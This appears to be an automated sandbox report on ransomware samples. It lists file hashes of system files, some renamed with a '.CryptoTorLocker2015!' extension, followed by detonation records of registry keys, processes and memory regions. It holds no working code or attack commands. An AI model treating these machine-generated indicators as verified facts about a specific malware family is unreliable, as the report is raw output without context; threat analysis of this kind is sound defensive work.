SHA256 d0beb258c8490c65bb8a4424ae1730bdb24df98eaf37b1d52a891f5c9ebf5bac
SHA512 ff0cb7a6f6eae76e50cf1f6983325db257e45529fe80cba329c1162420942bc3c47bd64a75879dc0b541feee03c935602fc0ecdb8a4e7c624266fb78e81ad170

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

MD5 ffbf2bc658cf1a8a9901ef9f192c094b
SHA1 817cf647561fefa2f6f39abefab5b8e11632fd6c
SHA256 9186ddf05e65ff27c19a459fa2dfe0e38d9573ef1faaafc603f2713e0f5f64da
SHA512 3c030b0b790369f0cf6b6ec0542da403d633798e08e8821489458a17f9354b61f428e7becaedc0927151a06d24c3f7f03a0f25e960d5e7e5af210b661a3b0d70

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

MD5 c780696ea1d56ea928df4681b3435609
SHA1 31f71503b00574927839d25ede949dd126031225
SHA256 f07e502291c9672738be28658f4b12c1afcaca26bc7b3b610876bc79e9307f03
SHA512 fbfcd4a1b2e8bd08d211d59978dd51e4deccf04991e1670ce33b095564e93bde2220bd97c7e29efa5480e389220d45c014a7f61ee066cc182a62bae2a5726e29

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

MD5 ffb59178fb577673d7cc5b79401245a2
SHA1 e3207356c84daeffeb45cbbf23a08b96c4e0caaa
SHA256 c8aac5d4ec6b53c8936618b353e7bcaa7bee9d5b2a4b5b334f701d97c0fa48d2
SHA512 813d9a716e5374d714aaff5b4bfca88a73d1bcb4196b8103795d9b47a88490063d2747140edf802aa8fcfa8a3110de8a87987a010f3ee9aeb75b87bfa34264a3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

MD5 d9f49b6ef4f5d29c92c9da5db52cfcb8
SHA1 88ee2da39af4c7611cc36cd0b1d7f3f4a671ddcc
SHA256 08b6e5c543d64a6548fb153253f85dcd54dd0b5ed24e68cc984fa04297b74a1b
SHA512 dcf4d9ea54fc9be582294d06d275702ee6c09ddf5b2819489933e93cd22bba27b3117b2908e530e5a075173db9957c3418b9d98b435944e9e13c359dfb440974

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp

MD5 c92534d067368b0756a0e3355ba7d550
SHA1 ba5068978269e0a7743a8fd358109354045422ab
SHA256 f38b3b88e91c00291abc7ab31bd1aa046db6e2b2d14494ac7b13a444666ebb48
SHA512 6ccbf9bc704fa9eaa1de4bf040c8ea90500174529c5a37de6578460ad05a449a5bf4782b12be91f644c6045f66f201c8fc86b5be3b6d9f7d0c561f5a4a567165

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

MD5 79398ace538244c380ee5af41e53dec6
SHA1 df7bf220aad89c7531a8bb9765936070f75682b9
SHA256 0aaddf2b0721f5e7fc3aebdfaa18f1c45907009a4befda5588ee4a6dcdd738c4
SHA512 6cf9bb01c4b43e42992eac1f652cfa4973d6e6a09371f71b98c3620c870d292640c92e6e4a0b28eb961bae7c1c49e45c78467ff58cab1557b2f549a666b2c02a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

MD5 2624896ab25a28ad930febeb917d8356
SHA1 6c67fb1208cc2ae20c4279f65c9a925354a62e82
SHA256 40ba19323849f52b653c8278e2c20267a212627be5ab4cb0200b460293575f5c
SHA512 d58652cdb4289591c0403b8d6606e3132e0b1e733c4ed9a3585a981a24b49f482a5e9d42c26f9d02f590e9278cd4b75cbc8aaeb5312f19f3996d342c4ad74150

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

MD5 bf3042833a6c246a40c37165ecc83e07
SHA1 fc37eb744eb3c584109fe691190279e52d2c8781
SHA256 be2a746c980fffb44ac812bfd1262ca6eb08374a90c93d2120a914543819a6d6
SHA512 8a30613747cd23510d5645b60196cc61363260e92806c2ee91f36039d3278147aa759029b40c7f534314e5782f512ffcb7eb8d684fc1285e31387663f6e4dbc4

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

MD5 bc7ce4d4699be659e16769b76b4de050
SHA1 70f315423507a7537e7899acee17dd27bd39115a
SHA256 d88b7acbc9828f288eb9023458384177f266ef604a7b0c1c94e8015438733235
SHA512 868777f1c9b95df1824c086a9b193a450460d134f5d8aafcd59827266910c4a1bc2e46e50d09c64d9716fe58266e4afae3bbae6971d0bef00877105f533abc83

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk

MD5 2912209d9dc1d26bfc91bf9b7378fdb1
SHA1 423e308dd510393a388ec555fecd7e945c6d9b88
SHA256 a43375940dd257f3559e1d62f6994d3c4d8180fc72e3c0eb2167aac81e9301d9
SHA512 5bc6d5b90d028fa502327ed240e76393e182a5d66bd5a417517efd5e5ecf110908b165f226025cd717f9e2c1603f6695957f204fe6691ba1b5ee498677a980f5

C:\Windows\Microsoft.NET\Framework\v3.5\SQL\fr\SqlPersistenceProviderLogic.sql

MD5 ada07201ac1c8365f196eba4a4dae9c7
SHA1 349ad3652210ba436c2c1f4eeb463117e3dc070f
SHA256 6d3b6e8b3c89eebad0d01ad51e62fe24ae9ff7a4c234efae6b8d0057dddfdd8f
SHA512 d99d17594d4624c665b96d403d2c5e57c662d7f91b1a74d2cc6f2e7f685d7cdb75786b549dad67ae37beb12e557cc0ff609b8d5939a4970621cd9578b3c9e6fc

C:\Windows\Microsoft.NET\Framework\v3.5\SQL\fr\DropSqlPersistenceProviderLogic.sql

MD5 4124b6a8cf8da0712e490167ae10d72c
SHA1 4eae836c779aca8d078956505ca8a95b049e8d9b
SHA256 c1f7fd5463bffc264f504f0d38eb82515954b6d8267389bc7337f2b449bc8457
SHA512 4c04b8a802c1774a2d838dbfddcfd8cf02ebb1a7c3982d3afde1f58610fce9502de4ebb7fc673c7e5440a18f248bb4f65e9e12829416e8e062145f1d7d16305f

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Images\alert_sml.gif

MD5 d0a40056de392086ddeb11198a2cd45a
SHA1 34f48a6f8228699de66701d93917808d9657a41b
SHA256 b0bc617fee418d963710f34df57703f0dcb1fda45584c6e5743c31dce185c4cc
SHA512 14cc4e38afd80b2884739e6baa10c4fffdb1410b85489c6fbd57c151850d8ae3f37fa44971132798267c0916e2470b3230be96a5aa50b6f016908078fe50eb48

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif

MD5 f2838a0de099fc5a69ee87423981db36
SHA1 80fa32edf46e2abf90877fe49a541d55a7dd9856
SHA256 a15345b0727c230ef2605019d9cec357a2cb289e60afe6ce0df752ad6d92c42d
SHA512 72df16006dd8b6f69a037a69b615e7e49a6988211f200db2313ce40483e7a3072d5f4d7a95b990e18d47755f5ecaf05dbdd2e2989472f56e1918f20b1959deac

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Images\selectedTab_leftCorner.gif

MD5 1d03a1f18ef9a8a9a774e50e52f036ba
SHA1 75cb64635107b64c57e33f99c92086cec70fb787
SHA256 6c652ffb36e75f0560415f1025df6c3b965e1f989d9732e4ae679663f167831b
SHA512 fd6d7e9a0d74979132b04273734dfc5fa379dc10ed00afb3a9838b3c52d25b254936199f0fbe9bdffb381f818e658e67be9013bc2500b81c606729ddeb6d34aa

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallSqlState.sql

MD5 432ebce2ad3517d6559273dcb484cc31
SHA1 8981951aa73b1cc9305f35b09249f16b8a079196
SHA256 a5d7cde843605d6c00dd704f2fa83b0d1295da8b18ff666954a4076e2d2f4c83
SHA512 871a04387a475e581082253181949381020310819827c1065b45627ce9ecb2514b5a915a410330f62d508e71c19cd8dea830631ddc940fa860babb1acda72d0e

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallRoles.sql

MD5 55dbcf7109b0551263273ee1a8ecbf66
SHA1 b3bff2f3415d4f1b5c2f610254b777cc9697a393
SHA256 aa2f4128fee770f74e9325e6e72abce59dcfbb5980d38302f78f7a8e44730211
SHA512 b20037cda73253418f527434d42260655d6940c8bff8fb15ec204ac16c35f8d6f190ea2d2e4e863228e6a5a3567a045c9f07ef810c582d61284dbfc79ecd03f3

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallProfile.SQL.CryptoTorLocker2015!

MD5 d3da1aa6ad0360382f77f2230c23425f
SHA1 e42e68f624c661fecfd3ef91d9e5d6d27a216563
SHA256 d45430cb1c408d5ad4e095e3b4210bd26716a97902f803086401908685973edc
SHA512 c9b509c40b4981c92ca71f68d14279674d210c3cc99d42c1f4787a11f1f51573d43f605cda9b687e24c17629f9be49b19ad41a8837e477213e2925c1ed883ebf

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallPersonalization.sql

MD5 e646010552ad2ffaa95f9ebc107f6969
SHA1 337dfa04dfd4c80ccdb1ce1c6c0c8c12e0885034
SHA256 24530a88a2612ed21750a1c0449d3257d4d006f96c9b83454b7ac92e509a6403
SHA512 cc1c2794501d9b5dd0f7c2742fd29613d7ef7a21a5db92e32fef7bc0529c5980e941440fc480c3bb92c7e82686b497d10e1deb4aaf8e6ff17226db64e9ddf941

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallPersistSqlState.sql

MD5 9c46db1b49c7049a34ab3e7ad8e56a2a
SHA1 e95a2ad382cc781733de92c32da83cff0b6cd82a
SHA256 7c3293547320e3fa293d6b57c76174d4d04da277b31c05caf887c163dc61c890
SHA512 3779bc01288b1e90e78ab84b24a1fa6b7bba703a9adddcfa7c59ad080ac49a80f8862b72b44e22a7e0c6d17213e618f830b4c5d0c0003c3179f70930c6f4b21e

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallMembership.sql

MD5 49102c1f3833175a241d83338646326f
SHA1 cc88d48f5a37cbc913d08c13da2ae2a26c009976
SHA256 bdb964d432eda80f424d0e9febbf188024503c8ba107de8fef1e52fc1bd4a7f9
SHA512 c0d5d05747321e5ff9b7e29d0e3ba0f4eb3f9eeb53f690562f31eb8941f5d9046e8d4a0e501fca05f6a1879e1f861791931d483bd78b4886c24afeed58a5541a

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallCommon.sql

MD5 7bbcc9e370638d22394f6d5af4486d39
SHA1 f0ee969e729e765b8001687da04703ca7b60a8ac
SHA256 39c70ad8de8bdccdccf160b4761329796c8706ca027321c3b0a81d5dd03b075b
SHA512 c81f53810c16cadbe8339ae2750dd3b2c2f463388a9a3aef8d16ce91b2a87821fc23f63625ff85f7e668e784b5ef82bcff53ff49664e89b2421decaaa95511d8

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallWebEventSqlProvider.sql

MD5 88a662680c6f3b060a7e533977da2496
SHA1 c400d61478dd2e8108eaabbabcf183ae917060e9
SHA256 556581a50779200d96628e404d1551278232f2eff69343111b22089dd3b47fff
SHA512 1bf5d2a36c00670b5104422657b0272612c416c88ab617129ca926b9d9b878d34f6f388204df5ac6725c8957c2bfd117869cc153f3e45b3d4611ed421447ad96

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallSqlStateTemplate.sql

MD5 88b8a0ae0536a61974f7dc620f195357
SHA1 abddaa82434ee348aa27db91ef6cb68db3125d91
SHA256 36c0b0bea0a5fed39d267fd45da2e893d26105b26517ff2ba0d144dcf7ed3d9e
SHA512 16aed64af5160e67af8faa4d69d92d53c2f5f9651eabfa1fd0ffeace87ec60902e97361ac348c72a75b4536b89dff20a3a64e5925764fbe2beac58594b4b5e72

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallSqlState.sql

MD5 38272bc4b3b0fa56e414a184770f5b17
SHA1 f378ee08d8ef29208f35d0c34ec0b08aac276974
SHA256 6db457a40dbe262465057c8389013d015d0122dc062a2e72cecb7662b288a147
SHA512 98f7cb86625e1a96641af580c67a97e72f035913c5825863a64a9481904650e5b9e2f66ff74ffe7b0a185da1b41dc23827ca37d69ded09f838e635bc16ede915

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallRoles.sql

MD5 52118b1d50a0f8a47194c8e191003359
SHA1 4a55194b437f573e5ea865c42ec0743f31d0b2fe
SHA256 3753635d468f56a7f0adf62387498ab5aa03b62c11046d19594bf0e1625ea3bf
SHA512 e9f3f70fcf492ec7a36418c7d5c67315f0a16f11435dad28cf604e3cc76d505c18d0352d94365ed50676d9eb6fb8edeed4bf2bc0ea7e1ef900c94fa63c8b2e7c

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UnInstallProfile.SQL

MD5 bd542f02309d968a131ecaf8dabf4248
SHA1 de6fed00901f41482e06ffd99a50be6a2aaf601e
SHA256 af17ff4d876b3c4e552cebd655de2ef2efdbdafed87ba50a3b21dd435a2c6dc5
SHA512 29048553476745384de92248e3b76b4b47dae03c213c08313118b41620e9fc58a063b2cf74869300031898c1d09252908a9364770baa0e1b591155f2dfa4a908

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallPersonalization.sql

MD5 dfdc85253f49c283cc75a4b128d017ba
SHA1 359b7da4e4e413e99d3b3773caea56edf7f2073e
SHA256 cc18fbac0b58c1505d360442abba2cd53e884656124106f2f5a020848b290e68
SHA512 495c91c04daedd63716b812c4403ec23f5f56f6ce0c7b8789c75e81be0d52bf8a5d6ef531f664ad83a6b4c4a3b6d9eee6e121c9058afe6572e305795aa2002bc

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallPersistSqlState.sql

MD5 dc0639ae3c7ba18e3c74168abd947859
SHA1 8ad8d8c81178ec7d2b0fa81ccb26d406a902eb7e
SHA256 4af963694f3b52e54bc85fdfe16afa1390758a49d81cebbac16c905804204b75
SHA512 b5ba393db0db4906493f02a26ba868a86a0bcbd81cb3a7b20f22d0e221782745d9e0a2d49ec4c2b6f1e9035aaf53c6de3bf3024795b62963abb068cfb53ac13f

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallMembership.sql

MD5 11127becf9e03e6139b4c61e7a6988c4
SHA1 96125b570233a39c70ede901c13c9e19d1d76e00
SHA256 735fab538a59f998bcacf4e2d1c5ebdfd9f35d3c1228337fad44f1c9d3a532b1
SHA512 1fdd8c8d04a7bd709c598db48a371d6328eb6358edf47f334986f317970f89c6b87520863776a1c15783d8931fca7d89750aaa893e9c294f5a279c46c95244b3

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallCommon.sql

MD5 fd26d27364c388f7dc184be92151a166
SHA1 318759750c9b417becc7f745c3510627f63ffd5c
SHA256 161dc7b1ffeea541cf7c64763dde828c7897a84d0fa5bb909c25e3ce07f6576e
SHA512 cde50443a9ee9225a9d392e56f3ca36f11809cd20a290fcc9638e5135b1cf06cdc7d60f8db3407efbe818a45fd6bf6a010e7e6bc0961b3514a4eee3e5070b6a1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallWebEventSqlProvider.sql

MD5 4678c5820a2a886b37a54c6c784b0590
SHA1 c574ca8ca213c6419ffa19a1f3692706f7bafb89
SHA256 80e110a34d6eafd0f248b2814808f6e3572895a88ac24357400fc940c8986a30
SHA512 45d2fd1a355e520bdba01bada794fe5a0ba19f9827eb249548b68318f8daf829eca302482a383c0e054042c61435af5f5f82a6673808865f8d8d8e11916e927b

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallSqlStateTemplate.sql

MD5 11737d5150b81522646f47c76eb10c84
SHA1 2708148d82dc07a0363b40cf8883419512cc80c4
SHA256 1307553006fc66e44b9c4e508c3f40d6917ce110e33b1d34ab2a93fa6ff6544c
SHA512 d17ee381a2ae454dceaba84bb997f5cee795f9eeefd5f7ae6fb139fe28e84150207e5e33a320c2a2cc02afd3fd67f8e96ddb77d13131a46b174b2c9dc59aced9

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg

MD5 1860e720ad4f55331d7185c1fcea579e
SHA1 c766092f230b2a378bcd3ab4aedb7a1776ed8467
SHA256 a1dc4745ed60a0cc8e495d16d7005f21629bade44653cf5a6a934483fac1e9f9
SHA512 635ef56ee98305109693a8e46011b6484bbc81283708874b97814c85564ac3cb9a701eab9dd756a54b0ed3bc48794c7723b9ef2840560c2acd46b1b9e8ba226e

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\alert_lrg.gif.CryptoTorLocker2015!

MD5 29c7210bd99f766cda8f375d1a16f9e5
SHA1 e7e9530b66ce631025a65423c250f2bbe3a86b29
SHA256 446dcd5add9869593190a1001e5790e8048f63ed76e28477caa1e11b206dd1aa
SHA512 cbe7a6796c4da760508e45a248ddb8e1bfe1f3e759bbf2a9b746828ca3cc2f57e242c2e5cdd96d4d7f44fd830d1af4bdbb6a11b37b24f4a69e9e53d2a8510c2f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onWhite.gif

MD5 ab8a70700c7534c5f9af6e5f7e2c23f9
SHA1 d0eb007b5d05134c664dffac14c086a4e6b6714f
SHA256 ad4ab21e70bdd13231185c353a955618666c1a7c9e30b221cb4ac84f29371471
SHA512 7594e41b679bc1a1891725b26e4de2e20e52b8ee7d7d7a6315c0aaf618daf2a64500ff3563409290686fc2a4cbdc5c18cab48ace9668c14c53de057a80e98917

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onBlue.gif

MD5 ae125a3f947a11f69cc225425d095f50
SHA1 e32bf922f60a7f4bd65c108269ea371f57943925
SHA256 668c93c281a6611418c7ec92ea5b21e24bf100771399ccc513661f3f114aefcf
SHA512 782bbb8dcc4422108d184dea69619449ff3d82898fcd901deee665dd68720e93fac62c3481be0093898074e6fc7cbd123411a8355b5c7671bcb88245cfe4608f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\folder.gif

MD5 197a93447d7d80d7aeb738acd9e4c099
SHA1 a0c74e4a4db335a5230ff4f58e98fbce74497555
SHA256 9bdc777e5f160bdcf8ac00ebc9f7c63c8df280fa79117da28065c0abcd247c19
SHA512 d0d3c86f7b903159f2056107ea7d663ef804e62ff9158f4f8147067c6a0f92ce7b0fb81f7744dcc496d841cdcbe1d025f0960c57711413eba83ad98134d9460b

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\deselectedTab_1x1.gif

MD5 688f57468dc1d6c0e1dbe5f8dcde5f2f
SHA1 576d7d044dd95da5c09f341004f791d5bf903346
SHA256 fd54935c228763e3361d78994d3b41b97093813d6db600b3b555661a00d07cff
SHA512 c21ca4f75f4c0bd8cbb50d51fa4ba1406aed7def20dfae12f76c6bb832e5e3e60db0f89c6c910ba251088dd4c79b11389c48bf818743ad193af4a8b15574d414

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg

MD5 e8ced8283051f0e9004c1812d6741d40
SHA1 4b2506ede93a47ffe96dad06d1263e1bc9322028
SHA256 ecf649e5ee1c8f3212090941eb0b1ed7ac76b246d31777f861873f880c2367f0
SHA512 5d4431870d1c878164ab38c0a85d1190d03eb3ebf9b1e85cdd7501e7a477cbb8878d3fe275df6740591c3f01077047461d9b4e9f3b013829c528e452059fa640

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\branding_Full2.gif

MD5 5910926f4e261b75d4ba178c15feea63
SHA1 61d3457501baa06269845b55206d3fe0995855c8
SHA256 962cd3769601dad0d30f17efbd3da51f0b261b46df6819f9947cfce6a16ddd30
SHA512 26cab0578b7e55e9675ae4e21b1f52ae492396e7d879e93180da57c2b0d2e0b2e36884dce6372681ce96550112af8560db76dbd3a7bd6a3aacdcff19836aeaef

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\aspx_file.gif

MD5 ec9433d394423af45f78c39f8cffb0e9
SHA1 7a7e79dede9c5c46c2dcf5878054f704272b8d0f
SHA256 c324d0f461cb7626337ef30f2b8634a70fa537cd123367c2e7e0fc9707d23fcb
SHA512 9612c4142e00cf09d9137b6eea419498e91563daef0decf9f5319c48d29471b0ea5b66281b64afe122344996305fb91b1c470429ceac854a66c096589409bcc9

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\requiredBang.gif

MD5 c84707819947eb41bf6b4b417334075d
SHA1 f8edf1a061f64dc931391df2ef10bada6f4cf835
SHA256 8e803a851c782b6ae92366e726f0d41dcb12cf87cad7395c4e33d3043eaf1a1b
SHA512 19fc44142ca427b26278375f1083f4c68b49db1004d7b7aade34c270e58c92a4c86b5121584c54690367b6a25765a46ac46e5e20b4b6b578fa94adf7a6e10504

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image2.gif

MD5 0043b6c341916282f5e1d4e49b478e9e
SHA1 9b1ceaaab5b4a8ffd2cef0a84e6dafbdaf4a4e42
SHA256 020402772f0a9f495f4d3f12569f19f67db4178286c84426f9138fc75f9cd6f2
SHA512 57611f68cc27f7aa7a202566496dd119a89e6e3e94a83d3154f209ecde122b62368e7504ff1c04da589aec2c2b0ec3783e689e5107371bc7fd92eec98384d467

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image1.gif

MD5 1afa2a66dbe507bc31d3c453440f3faa
SHA1 4f30bf7b9dbb514c1ea424a05327d618001a5b6b
SHA256 48b4c8aa92decefc8b8141cabfc31ee63818c0efed792a4ff3e00cdf5199161b
SHA512 e7df46d9e6fd806017d5ba97dd4cd7562f92e478299f311c41ec8c06be8a2e7e7ec88b70eee82b8cb476606738a1bb0fd44bd82aac9148e24893820945844daa

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\HelpIcon_solid.gif

MD5 0c9fc5016559a418b1193671d94dcc73
SHA1 6961962aa97cd1de858a84aa5c5283e65f197f8d
SHA256 e45af1dbf1a19c97cc59126c7af75ee2eb902f6a826eeb2b70708f1d9fdcbcf8
SHA512 63c84e618e252825ee5f6da974255b3e590c1c0631e74ec26c5cbcf859139c4a8954b245021fe08656974181bf4bf3a48ef1986cc049310f61030a572d56380a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\help.jpg

MD5 d0aee146540c60e81f1552e31b028898
SHA1 cd1e8d9e21610aa2aef9584a9e64901f8b0d9b3b
SHA256 c70aaf3e31365a34d6d6b15015dd1ad377f7012cd7db0c5bb041286c7f9fa747
SHA512 a388d8907e56602b518de1fd44e8d397f91e92620fea0d1a05ccecf3815894aa0495833bad9a0cd1de2a0db935eb6880eb214757885962109dee96bf29833d8a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\headerGRADIENT_Tall.gif

MD5 fb33ab93bb78106e653fb65334f0b0cd
SHA1 8359afddd03557fe0aa1704771cc5870a9f67d15
SHA256 1bd9e586889696c25d28d6a877663cbb34fd9412d9cb351556cb69bfc07766a0
SHA512 80da27899bde451923f66eb1ba99e0b15942bb6e544d8915d8a4aa346fcf23f258c62d0d4273ae7c996cfc450a879f818cf54e6fef84d5a30a5f78efeb73dc62

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\yellowCORNER.gif

MD5 7c7b5f3593ebd5d669611d44118a6e31
SHA1 8185c6a29419736054aceb9f2e761d4d733896dc
SHA256 45ef4a5652a2e349cf18ee81b92ca1a817b6ea27225470da5815bd4796360b15
SHA512 19e4d609fc7cb17ce7e0840d733562df7268a53133602a41b451fb571fdfd2bf976c727c28be953fe13e1ffe04d3edc119feb5d35fadb3773b04167d48fc9f51

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg

MD5 61d22b09b14e2b0875df290398336dd7
SHA1 61df1ce2502d7891edb10389528cddf80dcab6e0
SHA256 90c09c540a971540d7c6841ecad83c1d261ffc6ed060f699fbbf4f6dd1cfd59b
SHA512 53ce76387b3e88019199486b93390a1e0259f0de75d923a1bf2f1411927623556f014184acb316386ebcb34bdc33e8f2a2d8f378826e6d2991e2bfb213408d62

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\SqlPersistenceService_Logic.sql

MD5 f4f057b604bfc6d1343302a4a4ddccfc
SHA1 b6d9381af5b7db4f3ef44f55a4dfd9ec5b5c2427
SHA256 6959c49cb5771cc8bfad49f26190b21ae6bf86b2d1c2bf81e238ab55a48f7ac6
SHA512 7d3244ae757390e2a5c2203e93bdc9669b97f4b57809dfe224e99b8b6dcd29e42a150731479a3a05cb1c2a55dd4590462319a9a9af1927b580935dd7783fe3c8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\Tracking_Schema.sql

MD5 c582741e0f6f505437bbc7982a0f701f
SHA1 e4f8a2db91ff77bd7b76b1bf3bddaa87ed0f650d
SHA256 f8c483d0f29a5c3060cd26c197cc633abbc22c3c52c8f98d803570e92e8150ea
SHA512 66536ecff57248cad71c1a6813656ca1a65800ab133f33ee92283d91777f50168f8fd90fbba0c99aa696ac1b5166fded2448094710afa8eb4fee8a3bdfbffb75

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\Tracking_Logic.sql

MD5 171fa7faf74b283427aaed33f81ad96c
SHA1 6c4947ff30122834af18f4e37ccb292f98fcbef0
SHA256 5eebdd2c0677d4ad8e1016fd5fb8755110d4a496ca2f076fe143a42237b65776
SHA512 55daab525b60660efbd5d8618fc5540770c59259bc5af5c73b8da46672fbbbb25f814f1c0472398016f65c008f0c3da85d805b297ffde1423e3708155c18b653

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\SqlPersistenceService_Schema.sql

MD5 928658def675b7fffae606603ffbe9bf
SHA1 12b94cdf2af8345e095e0aa37d63dda87d2d6860
SHA256 8f29e7204e665f2d8fdee1e1172229c0603f99b8b74d15c159a0af45d3c19948
SHA512 c242ddf88c30fa5a57bfa431e973bbb2b276fd647a06687edf13a37997be45879a22772bb8b611378de1c5aa7d6e6fb9b5f69aed67fadbfaca4f254ca0ae8906

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe

"C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe"

C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe

"C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe" end

Network

N/A

Files

memory/1668-0-0x0000000000400000-0x0000000000423000-memory.dmp

memory/2332-1-0x0000000000400000-0x0000000000423000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241023-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe"

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe"

Network

N/A

Files

memory/2848-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmp

memory/2848-1-0x00000000010A0000-0x00000000011BE000-memory.dmp

memory/2848-2-0x0000000000280000-0x00000000002CC000-memory.dmp

memory/2848-15-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

memory/2848-29-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

memory/2644-28-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

memory/2644-30-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

memory/2644-31-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241010-en

Max time kernel

240s

Max time network

246s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected and EnCrypted.doc"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

